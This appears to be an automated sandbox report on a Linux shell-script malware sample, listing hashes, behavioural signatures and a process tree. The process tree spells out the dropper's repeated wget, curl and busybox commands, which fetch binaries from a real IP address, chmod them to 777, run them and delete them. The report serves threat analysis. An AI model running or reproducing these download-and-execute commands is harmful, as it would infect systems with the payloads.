Analysis
-
max time kernel
20s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
21/10/2024, 02:00
Static task
static1
Behavioral task
behavioral1
Sample
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
-
Size
10KB
-
MD5
f542050a645c72e971d62a3493d03ae4
-
SHA1
9517efa75044c18478c68a6d42b01b42a2af2329
-
SHA256
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c
-
SHA512
2934d0671bff24eb6ed85dc500e0d6b40470feb320ea6561cda2cb0e9aca88122ba2739e65472e29c40a565454c1182288cf4f4feb19d9143e1ecd3daab76a26
-
SSDEEP
96:VVRM3rrZCbd1HK0VBiVtx2VNzk4atFzbUeVRM3rrlXkbd1/f3s1O5VBiVtn:0Cbd1q0VBiVtx2VNGjd1jVBiVtn
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1665 chmod 1521 chmod 1527 chmod 1575 chmod 1581 chmod 1593 chmod 1635 chmod 1551 chmod 1641 chmod 1515 chmod 1569 chmod 1659 chmod 1539 chmod 1611 chmod 1647 chmod 1671 chmod 1557 chmod 1587 chmod 1599 chmod 1623 chmod 1629 chmod 1653 chmod 1509 chmod 1533 chmod 1545 chmod 1605 chmod 1563 chmod 1617 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe 1510 TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 1516 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP 1522 IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX 1528 S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe 1534 Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf 1540 uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 1546 miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE 1552 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq 1558 afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC 1564 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH 1570 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l 1576 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 1582 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP 1588 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC 1594 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH 1600 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l 1606 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 1612 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP 1618 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe 1624 TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 1630 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP 1636 IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX 1642 S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe 1648 Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf 1654 uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 1660 miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE 1666 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq 1672 afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l curl File opened for modification /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 curl File opened for modification /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP curl File opened for modification /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX curl File opened for modification /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe curl File opened for modification /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l curl File opened for modification /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 curl File opened for modification /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH curl File opened for modification /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe curl File opened for modification /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC curl File opened for modification /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX curl File opened for modification /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq curl File opened for modification /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC curl File opened for modification /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP curl File opened for modification /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe curl File opened for modification /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP curl File opened for modification /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE curl File opened for modification /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP curl File opened for modification /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE curl File opened for modification /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 curl File opened for modification /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe curl File opened for modification /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 curl File opened for modification /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 curl File opened for modification /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq curl File opened for modification /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH curl File opened for modification /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf curl File opened for modification /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf curl File opened for modification /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 curl
Processes
-
/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh1⤵PID:1501
-
/bin/rm/bin/rm bins.sh2⤵PID:1502
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵PID:1503
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵
- Writes file to tmp directory
PID:1507
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵PID:1508
-
-
/bin/chmodchmod 777 TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵
- File and Directory Permissions Modification
PID:1509
-
-
/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe./TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵
- Executes dropped EXE
PID:1510
-
-
/bin/rmrm TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵PID:1511
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵PID:1512
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵
- Writes file to tmp directory
PID:1513
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵PID:1514
-
-
/bin/chmodchmod 777 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵
- File and Directory Permissions Modification
PID:1515
-
-
/tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5./1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵
- Executes dropped EXE
PID:1516
-
-
/bin/rmrm 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵PID:1517
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵PID:1518
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵
- Writes file to tmp directory
PID:1519
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵PID:1520
-
-
/bin/chmodchmod 777 IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵
- File and Directory Permissions Modification
PID:1521
-
-
/tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP./IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵
- Executes dropped EXE
PID:1522
-
-
/bin/rmrm IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵PID:1523
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵PID:1524
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵
- Writes file to tmp directory
PID:1525
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵PID:1526
-
-
/bin/chmodchmod 777 S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵
- File and Directory Permissions Modification
PID:1527
-
-
/tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX./S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵
- Executes dropped EXE
PID:1528
-
-
/bin/rmrm S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵PID:1529
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵PID:1530
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵
- Writes file to tmp directory
PID:1531
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵PID:1532
-
-
/bin/chmodchmod 777 Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵
- File and Directory Permissions Modification
PID:1533
-
-
/tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe./Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵
- Executes dropped EXE
PID:1534
-
-
/bin/rmrm Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵PID:1535
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵PID:1536
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵
- Writes file to tmp directory
PID:1537
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵PID:1538
-
-
/bin/chmodchmod 777 uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵
- File and Directory Permissions Modification
PID:1539
-
-
/tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf./uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵
- Executes dropped EXE
PID:1540
-
-
/bin/rmrm uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵PID:1541
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵PID:1542
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵
- Writes file to tmp directory
PID:1543
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵PID:1544
-
-
/bin/chmodchmod 777 miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵
- File and Directory Permissions Modification
PID:1545
-
-
/tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0./miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵
- Executes dropped EXE
PID:1546
-
-
/bin/rmrm miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵PID:1547
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵PID:1548
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵
- Writes file to tmp directory
PID:1549
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵PID:1550
-
-
/bin/chmodchmod 777 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵
- File and Directory Permissions Modification
PID:1551
-
-
/tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE./59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵
- Executes dropped EXE
PID:1552
-
-
/bin/rmrm 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵PID:1553
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵PID:1554
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵
- Writes file to tmp directory
PID:1555
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵PID:1556
-
-
/bin/chmodchmod 777 afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵
- File and Directory Permissions Modification
PID:1557
-
-
/tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq./afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵
- Executes dropped EXE
PID:1558
-
-
/bin/rmrm afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵PID:1559
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:1560
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- Writes file to tmp directory
PID:1561
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:1562
-
-
/bin/chmodchmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- File and Directory Permissions Modification
PID:1563
-
-
/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- Executes dropped EXE
PID:1564
-
-
/bin/rmrm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:1565
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:1566
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- Writes file to tmp directory
PID:1567
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:1568
-
-
/bin/chmodchmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- File and Directory Permissions Modification
PID:1569
-
-
/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- Executes dropped EXE
PID:1570
-
-
/bin/rmrm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:1571
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵PID:1572
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵
- Writes file to tmp directory
PID:1573
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵PID:1574
-
-
/bin/chmodchmod 777 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵
- File and Directory Permissions Modification
PID:1575
-
-
/tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l./fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵
- Executes dropped EXE
PID:1576
-
-
/bin/rmrm fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵PID:1577
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵PID:1578
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵
- Writes file to tmp directory
PID:1579
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵PID:1580
-
-
/bin/chmodchmod 777 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵
- File and Directory Permissions Modification
PID:1581
-
-
/tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1./I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵
- Executes dropped EXE
PID:1582
-
-
/bin/rmrm I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵PID:1583
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵PID:1584
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵
- Writes file to tmp directory
PID:1585
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵PID:1586
-
-
/bin/chmodchmod 777 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵
- File and Directory Permissions Modification
PID:1587
-
-
/tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP./he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵
- Executes dropped EXE
PID:1588
-
-
/bin/rmrm he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵PID:1589
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:1590
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- Writes file to tmp directory
PID:1591
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:1592
-
-
/bin/chmodchmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- File and Directory Permissions Modification
PID:1593
-
-
/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- Executes dropped EXE
PID:1594
-
-
/bin/rmrm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:1595
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:1596
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- Writes file to tmp directory
PID:1597
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:1598
-
-
/bin/chmodchmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- File and Directory Permissions Modification
PID:1599
-
-
/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- Executes dropped EXE
PID:1600
-
-
/bin/rmrm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:1601
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵PID:1602
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵
- Writes file to tmp directory
PID:1603
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵PID:1604
-
-
/bin/chmodchmod 777 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵
- File and Directory Permissions Modification
PID:1605
-
-
/tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l./fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵
- Executes dropped EXE
PID:1606
-
-
/bin/rmrm fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵PID:1607
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵PID:1608
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵
- Writes file to tmp directory
PID:1609
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵PID:1610
-
-
/bin/chmodchmod 777 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵
- File and Directory Permissions Modification
PID:1611
-
-
/tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1./I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵
- Executes dropped EXE
PID:1612
-
-
/bin/rmrm I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵PID:1613
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵PID:1614
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵
- Writes file to tmp directory
PID:1615
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵PID:1616
-
-
/bin/chmodchmod 777 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵
- File and Directory Permissions Modification
PID:1617
-
-
/tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP./he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵
- Executes dropped EXE
PID:1618
-
-
/bin/rmrm he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵PID:1619
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵PID:1620
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵
- Writes file to tmp directory
PID:1621
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵PID:1622
-
-
/bin/chmodchmod 777 TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵
- File and Directory Permissions Modification
PID:1623
-
-
/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe./TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵
- Executes dropped EXE
PID:1624
-
-
/bin/rmrm TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵PID:1625
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵PID:1626
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵
- Writes file to tmp directory
PID:1627
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵PID:1628
-
-
/bin/chmodchmod 777 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵
- File and Directory Permissions Modification
PID:1629
-
-
/tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5./1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵
- Executes dropped EXE
PID:1630
-
-
/bin/rmrm 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵PID:1631
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵PID:1632
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵
- Writes file to tmp directory
PID:1633
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵PID:1634
-
-
/bin/chmodchmod 777 IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵
- File and Directory Permissions Modification
PID:1635
-
-
/tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP./IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵
- Executes dropped EXE
PID:1636
-
-
/bin/rmrm IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵PID:1637
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵PID:1638
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵
- Writes file to tmp directory
PID:1639
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵PID:1640
-
-
/bin/chmodchmod 777 S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵
- File and Directory Permissions Modification
PID:1641
-
-
